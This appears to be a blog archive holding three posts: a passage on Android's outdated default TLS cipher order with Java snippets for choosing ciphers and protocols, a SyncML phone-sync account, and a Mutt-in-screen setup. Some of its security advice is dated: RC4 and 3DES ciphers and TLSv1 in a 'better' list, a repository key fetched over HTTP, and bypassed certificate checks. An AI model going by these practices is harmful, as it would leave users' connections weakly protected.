SSL_RSA_WITH_DES_CBC_SHA | TLS_RSA_WITH_AES_128_CBC_SHA | TLS_RSA_WITH_AES_128_CBC_SHA |
SSL_RSA_WITH_3DES_EDE_CBC_SHA | TLS_DHE_RSA_WITH_AES_128_CBC_SHA | TLS_DHE_RSA_WITH_AES_128_CBC_SHA |
SSL_DHE_DSS_WITH_DES_CBC_SHA | TLS_DHE_DSS_WITH_AES_128_CBC_SHA | TLS_DHE_DSS_WITH_AES_128_CBC_SHA |
SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA | SSL_RSA_WITH_3DES_EDE_CBC_SHA | SSL_RSA_WITH_3DES_EDE_CBC_SHA |
SSL_RSA_EXPORT_WITH_RC4_40_MD5 | SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA | SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA |
SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA | SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA | SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA |
SSL_RSA_WITH_NULL_MD5 | SSL_RSA_WITH_DES_CBC_SHA | SSL_RSA_WITH_DES_CBC_SHA |
SSL_RSA_WITH_NULL_SHA | SSL_DHE_RSA_WITH_DES_CBC_SHA | SSL_DHE_RSA_WITH_DES_CBC_SHA |
SSL_DH_anon_WITH_RC4_128_MD5 | SSL_DHE_DSS_WITH_DES_CBC_SHA | SSL_DHE_DSS_WITH_DES_CBC_SHA |
SSL_DH_anon_WITH_DES_CBC_SHA | SSL_RSA_EXPORT_WITH_RC4_40_MD5 | SSL_RSA_EXPORT_WITH_RC4_40_MD5 |
SSL_DH_anon_WITH_3DES_EDE_CBC_SHA | SSL_RSA_EXPORT_WITH_DES40_CBC_SHA | SSL_RSA_EXPORT_WITH_DES40_CBC_SHA |
SSL_DH_anon_EXPORT_WITH_RC4_40_MD5 | SSL_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA | SSL_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA |
SSL_DH_anon_EXPORT_WITH_DES40_CBC_SHA | SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA | SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA |
| | TLS_EMPTY_RENEGOTIATION_INFO_SCSV |
The original list resembles the CipherSpec definition in RFC 2246 from 1999, sorted numerically with the NULL and 40-bit ciphers moved down. Somewhere between the first release and 1.4.2, DES was deprecated, TLS was added to the mix (bringing in AES) and MD5 was pushed in front of SHA1 (which makes one wonder why). After that, the only change was the addition of TLS_EMPTY_RENEGOTIATION_INFO_SCSV, which is not a cipher but just an information token for the server.
Java 7 added Elliptic Curves and significantly improved the cipher list in 2011, but Android is based on JDK 6, making the effective default cipher list over 10 years old now.
Conclusion
The cipher order on the vast majority of Android devices was defined by Sun in 2002 and carried over into the Android project in 2010 as an attempt to improve compatibility. RC4 has been considered problematic since 2001 (remember WEP?), and MD5 was broken in 2009.
The change from the strong OpenSSL cipher list to a hardcoded one starting with weak ciphers is either a sign of horrible ignorance, security incompetence or a clever disguise for an NSA-influenced manipulation - you decide! (This was before BEAST made the other ciphers in TLS less secure in 2011 and RC4 gained momentum again)
All that notwithstanding, now is the time to get rid of RC4-MD5, in your applications as well as in the Android core! Call your representative on the Google board and let them know!
Appendix A: Making your app more secure
If your app is only ever making contact to your own server, feel free to choose the best cipher that fits into your CPU budget! Otherwise, it is hard to give generic advice for an app to support a wide variety of different servers without producing obscure connection errors.
Update: Server-Side Changes
The cipher priority order is defined by the client, but the server has the option to override it with its own. Server operators should read the excellent best practices document by SSLLabs.
Further resources for server admins:
Changing the client cipher list
For client developers, I am recycling the well-motivated browser cipher suite proposal written by Brian Smith at Mozilla, even though I share Bruce Schneier's scepticism on EC cryptography. The following is a subset of Brian's ciphers which are supported on Android 4.2.2, and the last three ciphers are named SSL_ instead of TLS_ (Warning: BEAST ahead!).
// put this in a place where it can be reused
static final String ENABLED_CIPHERS[] = {
"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA",
"TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA",
"TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA",
"TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA",
"TLS_DHE_RSA_WITH_AES_128_CBC_SHA",
"TLS_DHE_RSA_WITH_AES_256_CBC_SHA",
"TLS_DHE_DSS_WITH_AES_128_CBC_SHA",
"TLS_ECDHE_RSA_WITH_RC4_128_SHA",
"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA",
"TLS_RSA_WITH_AES_128_CBC_SHA",
"TLS_RSA_WITH_AES_256_CBC_SHA",
"SSL_RSA_WITH_3DES_EDE_CBC_SHA",
"SSL_RSA_WITH_RC4_128_SHA",
"SSL_RSA_WITH_RC4_128_MD5",
};
// create an SSLContext with the default trust settings, then get a socket
SSLContext sslcontext = SSLContext.getInstance("TLS");
sslcontext.init(null, null, null);
SSLSocket s = (SSLSocket)sslcontext.getSocketFactory().createSocket(host, port);
// IMPORTANT: set the cipher list before calling getSession(),
// startHandshake() or reading/writing on the socket!
s.setEnabledCipherSuites(ENABLED_CIPHERS);
...
Use TLS v1.2!
By default, TLS version 1.0 is used, and the more recent protocol versions are disabled. Some servers used to be broken when contacted using v1.2, so this approach seemed a good conservative choice over a year ago.
At least for XMPP, an attempt to enforce TLS v1.2 is being made. You can follow with your own app easily:
// put this in a place where it can be reused
static final String ENABLED_PROTOCOLS[] = {
"TLSv1.2", "TLSv1.1", "TLSv1"
};
// put this right before setEnabledCipherSuites()!
s.setEnabledProtocols(ENABLED_PROTOCOLS);
Use NetCipher!
NetCipher is an Android library made by the Guardian Project to improve network security for mobile apps. It comes with a StrongTrustManager to do more thorough certificate checks, an independent Root CA store, and code to easily route your traffic through the Tor network using Orbot.
Use AndroidPinning!
AndroidPinning is another Android library, written by Moxie Marlinspike to allow pinning of server certificates, improving security against government-scale MitM attacks. Use this if your app is made to communicate with a specific server!
Use MemorizingTrustManager!
MemorizingTrustManager by yours truly is yet another Android library. It allows your app to ask the user if they want to trust a given self-signed/untrusted certificate, improving support for regular connections to private services. If you are writing an XMPP client or a private cloud sync app, use this!
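A rough integration sketch, written from memory (see the project README for the authoritative version):

import java.security.SecureRandom;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.X509TrustManager;
import de.duenndns.ssl.MemorizingTrustManager;

// inside an Activity or Service: replace the default trust checks with MTM,
// which falls back to asking the user about unknown certificates
SSLContext sc = SSLContext.getInstance("TLS");
sc.init(null, new X509TrustManager[] { new MemorizingTrustManager(this) },
        new SecureRandom());
HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());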
Appendix B: Apps that do care
Android Browser
Checks of the default Android Browser revealed that at least until Android 2.3.7 the Browser was using the default cipher list of the OS, participating in the RC4 regression.
As of 4.2.2, the Browser comes with a longer, better, stronger cipher list:
ECDHE-RSA-AES256-SHA ECDHE-ECDSA-AES256-SHA SRP-DSS-AES-256-CBC-SHA SRP-RSA-AES-256-CBC-SHA DHE-RSA-AES256-SHA DHE-DSS-AES256-SHA ECDH-RSA-AES256-SHA ECDH-ECDSA-AES256-SHA AES256-SHA ECDHE-RSA-DES-CBC3-SHA ECDHE-ECDSA-DES-CBC3-SHA SRP-DSS-3DES-EDE-CBC-SHA SRP-RSA-3DES-EDE-CBC-SHA EDH-RSA-DES-CBC3-SHA EDH-DSS-DES-CBC3-SHA ECDH-RSA-DES-CBC3-SHA ECDH-ECDSA-DES-CBC3-SHA DES-CBC3-SHA ECDHE-RSA-AES128-SHA ECDHE-ECDSA-AES128-SHA SRP-DSS-AES-128-CBC-SHA SRP-RSA-AES-128-CBC-SHA DHE-RSA-AES128-SHA DHE-DSS-AES128-SHA ECDH-RSA-AES128-SHA ECDH-ECDSA-AES128-SHA AES128-SHA ECDHE-RSA-RC4-SHA ECDHE-ECDSA-RC4-SHA ECDH-RSA-RC4-SHA ECDH-ECDSA-RC4-SHA RC4-SHA RC4-MD5
Update: Surprisingly, the Android WebView class (tested on Android 4.0.4) is also using the better ciphers.
Update: Google Chrome
The Google Chrome browser (version 30.0.1599.82, 2013-10-11) serves the following list:
ECDHE-RSA-AES256-GCM-SHA384 ECDHE-ECDSA-AES256-GCM-SHA384 ECDHE-RSA-AES256-SHA ECDHE-ECDSA-AES256-SHA DHE-DSS-AES256-GCM-SHA384 DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256 DHE-DSS-AES256-SHA256 DHE-RSA-AES256-SHA DHE-DSS-AES256-SHA AES256-GCM-SHA384 AES256-SHA256 AES256-SHA ECDHE-RSA-DES-CBC3-SHA ECDHE-ECDSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA EDH-DSS-DES-CBC3-SHA DES-CBC3-SHA ECDHE-RSA-AES128-GCM-SHA256 ECDHE-ECDSA-AES128-GCM-SHA256 ECDHE-RSA-AES128-SHA256 ECDHE-ECDSA-AES128-SHA256 ECDHE-RSA-AES128-SHA ECDHE-ECDSA-AES128-SHA DHE-DSS-AES128-GCM-SHA256 DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES128-SHA256 DHE-DSS-AES128-SHA256 DHE-RSA-AES128-SHA DHE-DSS-AES128-SHA AES128-GCM-SHA256 AES128-SHA256 AES128-SHA ECDHE-RSA-RC4-SHA ECDHE-ECDSA-RC4-SHA RC4-SHA RC4-MD5
This one comes with AES256-GCM and SHA384! Good work, Google! Now please go and make these the default for the Android runtime!
Update: Firefox
Firefox Browser for Android (version 24.0 from F-Droid) comes with its own cipher suite list as well. However, contrary to Chrome, it is missing the GCM ciphers that would mitigate the BEAST attack.
ECDHE-ECDSA-AES256-SHA ECDHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA DHE-DSS-CAMELLIA256-SHA DHE-RSA-AES256-SHA DHE-DSS-AES256-SHA ECDH-RSA-AES256-SHA ECDH-ECDSA-AES256-SHA CAMELLIA256-SHA AES256-SHA ECDHE-ECDSA-RC4-SHA ECDHE-ECDSA-AES128-SHA ECDHE-RSA-RC4-SHA ECDHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA DHE-DSS-CAMELLIA128-SHA DHE-RSA-AES128-SHA DHE-DSS-AES128-SHA ECDH-RSA-RC4-SHA ECDH-RSA-AES128-SHA ECDH-ECDSA-RC4-SHA ECDH-ECDSA-AES128-SHA SEED-SHA CAMELLIA128-SHA RC4-SHA RC4-MD5 AES128-SHA ECDHE-ECDSA-DES-CBC3-SHA ECDHE-RSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA EDH-DSS-DES-CBC3-SHA ECDH-RSA-DES-CBC3-SHA ECDH-ECDSA-DES-CBC3-SHA FIPS-3DES-EDE-CBC-SHA DES-CBC3-SHA
My favorite pick from that list: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA.
Enabling TLSv1.2 does not change the cipher list. BEAST is mitigated in TLSv1.2, but the Lucky13 attack might still bite you.
Send In Your App!
If you have an Android app with a significant user base that has a better cipher list, let me know and I will add it to the list.
Further Reading
- Real World Crypto 2013 by Adam Langley from Google
- Why does the web still run on RC4? by Luke Mather
- SSL/TLS in a Post-PRISM Era
- CyanogenMod issue
- Android issue #61085
- Test your browser
- A revised version of this article appeared in the Magdeburger Journal zur Sicherheitsforschung (PDF).
- Comments: HN, Slashdot, Reddit
My love hate aversion to SyncML
Some years ago, I accidentally managed to synchronize my Nokia E65 phone to Evolution using Bluetooth, OpenSync packages from a custom repository, a huge amount of patience and a blood sacrifice to the gods of bloated binary XML protocols.
Unfortunately, soon after that my file system crashed, I reinstalled Debian and the magic setup was forever gone. Whatever I tried, all I got were opaque error messages. After many months of moot efforts, I finally gave up the transfer of events onto my phone and of phone numbers onto my PC. Sigh.
It was only last autumn that I dared to challenge my luck again. After setting up a new colo box (it is serving this blog article right now) and having upgraded my Android toy-phone to an Android 2.x firmware, it was time to get my data from the good old Nokia phone to the Android device. Somehow.
The Quest of SyncML, part 1: eGroupWare
I began my quest by simply installing the current version of eGroupWare from the Debian Backports repository. Unfortunately, this version (1.6.002) is flawed with regard to SyncML. It worked partially with my cell phone, and failed miserably with Evolution.
After several days of fruitless efforts, I found a set of SyncML patches for eGroupWare written by Jörg Lehrke, which are already integrated into 1.6.003. Fortunately, eGroupWare.org is offering Debian 5.0 packages as well. I just added the following line to my /etc/apt/sources.list and installed the new version:
deb http://download.opensuse.org/repositories/server:/eGroupWare/Debian_5.0/ ./
Do not forget to import the repository key as well:
wget -O - http://download.opensuse.org/repositories/server:/eGroupWare/Debian_5.0/Release.key | apt-key add -
With the shiny new eGroupWare, I only needed to wipe my previous synchronization efforts and to enable the SyncML application for the Default user group. Et voilà, I could access my new RPC server at https://<servername>/egroupware/rpc.php
Part 2: Evolution
This step works more or less properly; an official HOWTO is available. The only thing I have not automated yet is the synchronization itself. It still requires manually running
syncevolution <servername>
Update, 2011-05-15: If you are running Debian, do not use its default packages. After my last dist-upgrade (sid), syncevolution thought it was a good idea to parse its plaintext config files, generate an XML-based config and throw it up on me due to strange parser errors.
Uninstalling syncevolution* and using the syncevolution-evolution package from
deb http://downloads.syncevolution.org/apt unstable main
solved my troubles, however.
Part 3: Nokia E65
Fortunately, Nokia already includes a SyncML client with their smartphones. It is almost trivial to set up following the official howto. With eGroupWare 1.6.003, I could even set the SyncML version to 1.2 to obtain the full contacts information.
Fortunately, it was also very easy to add the CAcert root certificate to the Nokia device, allowing end-to-end encryption of my sensitive personal data.
Part 4: Android
Now, the real fun began. Android comes preinstalled with a well-working synchronization service which is pushing all your data to Google servers. Not that I would mind Google having the data, I just wanted to be able to snapshot my contacts and calendar whenever I need to.
There are as well clients for other synchronization protocols. ActiveSync is supported out-of-the-box (and there is the GPL'ed Z-Push ActiveSync server); Funambol and Synthesis implement SyncML on Android.
Because I already had SyncML running and Funambol is Open-Source and looked generally promising, I started my work with it. However, the Android client is "optimized" for interacting with the Funambol server (read: it interoperates with other implementations only by chance).
Besides the hell imposed on the unlucky ones trying to compile android-client for themselves instead of using the Market version, there were various compatibility issues.
In addition to that, SSL verification is only possible using the certificates already stored in the system. Neither self-signed nor community-signed SSL connections are possible.
If you have root permissions, there is a workaround to add CAcert:
# adb pull /system/etc/security/cacerts.bks .
# keytool -keystore cacerts.bks -storetype BKS -provider org.bouncycastle.jce.provider.BouncyCastleProvider -storepass changeit -import -v -trustcacerts -alias cacert_org_class_3 -file cacert_class3.crt
Certificate was added to keystore
[Storing cacerts.bks]
# adb remount
remount succeeded
# adb push cacerts.bks /system/etc/security/cacerts.bks
Nevertheless, the experience was so frustrating that I started my own project to improve SSL certificate management on Android.
After many fruitless attempts at getting reproducible synchronization with Funambol's Android client, I decided to test Synthesis. It installed, allowed me to bypass SSL certificate checking (which is not quite perfect, but at least better than no SSL at all) and synced all my contacts at first attempt. Wow! Considering the time I have put into Funambol, paying 18€ for a Synthesis license really looks inexpensive in hindsight.
However, not everything is as shiny as it looks at first. It seems Synthesis does not provide its own calendar backend. Instead, it uses whatever is available on the device. My device, however, seems to be lacking any calendar providers, unless I install the Funambol client. So all in all, I am using Synthesis to synchronize events into the Funambol-provided calendar, because Funambol itself fails at syncing them. Funny, isn't it?
Update: After upgrading eGroupWare to 1.8.001, I can actually synchronize my events to my Android using Funambol. Because they change much more often than my contacts, I might actually stick to this software for some more time without buying Synthesis...
Update, 2011-05-15: I finally found the "bug" responsible for my lack of contacts synchronization. I happened to have a contact with an "&" sign, which was transmitted verbatim by eGroupWare, freaking out the Funambol parser. After renaming the contact, life suddenly became great passable!
Conclusion
SyncML is a friggin' huge pile of shi bloat. Just sync your devices to Google and your experience will be great.
As a long-time Mutt user I always looked with envy at you Thunderbird and Kmail and what-not fans, as you could spawn new windows for reading and writing e-mails with a mere click (or sometimes a double-click).
It was just too bothersome to have $EDITOR block my inbox until I finished writing, or to give up and postpone the mail, losing track of it. As I am using Screen to run Mutt anyway, it seemed like a logical step to make it spawn new screen windows for writing mails and opening other mailboxes. The problem of multiplexing Mutt seems to have occurred to other people before as well; however, the solution is not quite easy to spot.
The Idea Behind Mutt Multiplexing
The suggestion for people like me is: replace editor with a command line that spawns a new terminal and opens up mutt -H on a copy of the temp file. The original mutt will then see that the message was not changed and drop it silently, while the new instance allows editing.
Fortunately, you can call screen from inside screen, thus creating a new window, so project mutt-screen was born! Unfortunately, not everything was as easy as expected.
The Gory Details, version 1
So, to make the whole thing better manageable, let's split that editor setting line into two parts: a script that is called in the new screen window, and what needs to be done in the original mutt instance.
Let's call the script ~/bin/mutt-compose.sh:
#!/bin/sh
# open the draft copy in a new mutt instance, then delete the temp file
mutt -H "$1"
rm "$1"
Now, let's make a copy of the mail draft (%s) and run the composer in a new screen window:
# edit messages in a new screen window
set editor="cp %s %s.2; screen -t composer ~/bin/mutt-compose.sh %s.2"
unset wait_key
Great! We did it! Oh wait, no! It's a fork bomb! The new composer of course evaluates editor and launches... another copy of itself.
Edit the editor, version 2
Consequently, we need to override editor for the editing instance. Because we need to prevent the new Mutt from inserting a second .sig and more headers, let's create a second config file. Then we can call mutt -F ~/.mutt_compose -H "$1" from the script, with ~/.mutt_compose containing:
# read main config
source ~/.muttrc
# remove hooks, headers and sig, they are already in the draft
unhook send-hook
unset signature
unmy_hdr *
# call the right editor immediately
set autoedit=yes
set editor="vim +'set tw=72' +/^$/+1"
But now it's going to work, isn't it? Not quite - something happened to postponed messages! Why are there now two edit windows? It seems Mutt has a different code path for messages which have been edited already. Here, the first instance ignores that the message was not edited and falls through to the compose window, while the second instance runs the editor (and permanently deletes the message if you do not explicitly save it, oops!).
Forking the editor - or not? Version 3
Our forking-out of the editor causes problems in three cases, as it seems: <recall-message>, <edit> and <resend-message>/<forward-message>. The first can be worked around by using a custom macro:
# override the <recall-message> hotkey
macro index,pager R "<shell-escape>screen -t postponed mutt -F ~/.mutt_compose -p<enter>"
# prevent recall on <mail>
set recall=no
This comes at the additional discomfort of not being asked if you want to resume writing your last mail when pressing m. That might be possible to achieve with some workaround - feel free to leave a comment if you find one.
For <edit>, the only viable workaround seems to be resetting editor to its former state, editing the message in-place and setting editor back to the screen call. Inconvenient, blocking your main Mutt, but possible.
# bonus points for outsourcing the two different editor settings into their own
# source'able one-liners...
macro index,pager e '<enter-command>set editor="vim +set\ tw=72 +/^$/+1"<enter><edit><enter-command>set editor="cp %s %s.2; screen -t composer ~/bin/mutt-compose.sh %s.2"<enter>'
With <resend-message>/<forward-message>, there is no workaround. I tried pushing keys into the buffer to quit the compose window, changing relevant settings, making blood sacrifices to various gods, all without success. So far I have to live with manually quitting the first composer and editing the message in the second one. Yikes.
The resulting config, version 4 (final)
When we put everything together, the following settings files should be in place.
~/.muttrc
# do not forget your own settings...
# edit messages in a new screen window
set editor="cp %s %s.2; screen -t composer ~/bin/mutt-compose.sh %s.2"
unset wait_key
# override the <recall-message> hotkey
macro index,pager R "<shell-escape>screen -t postponed mutt -F ~/.mutt_compose -p<enter>"
# prevent recall on <mail>
set recall=no
# set the editor for editing messages in-place
macro index,pager e '<enter-command>set editor="vim +set\ tw=72 +/^$/+1"<enter><edit><enter-command>set editor="cp %s %s.2; screen -t composer ~/bin/mutt-compose.sh %s.2"<enter>'
# open mailbox listing in a new window
macro index,pager y "<shell-escape>screen -t mboxes mutt -y<enter>"
~/bin/mutt-compose.sh
#!/bin/sh
# set the screen window title to the message receiver
awk -F 'To: ' '/^To:/ { print "\033k" $2 "\033\\" }' "$1"
mutt -F ~/.mutt_compose -H "$1"
rm "$1"
~/.mutt_compose
# read main config
source ~/.muttrc
# remove hooks, headers and sig, they are already in the draft
unhook send-hook
unset signature
unmy_hdr *
# call the right editor immediately
set autoedit=yes
set editor="vim +'set tw=72' +/^$/+1"
The following .screenrc.mutt file can be used to spawn a screen with your inbox in it and a status bar showing the outsourced instances:
~/.screenrc.mutt
hardstatus alwayslastline "%-Lw%{=b BW} %50>%n%f* %t %{-}%+Lw%< "
sorendition = bG
vbell off
# start mutt directly in a window
screen -t INBOX mutt
Conclusion
This solution is not perfect. In certain corner cases (<resend-message>) it just does not behave. In other situations (caching the PGP passphrase does not work) it offers less comfort. Nevertheless, it has increased my Mutt productivity and decreased my frustration a lot. Now all that is missing is clean support for multiple profiles (read: without having many scripts bound to clumsy keyboard shortcuts) and a proper in-mutt mechanism for message tags.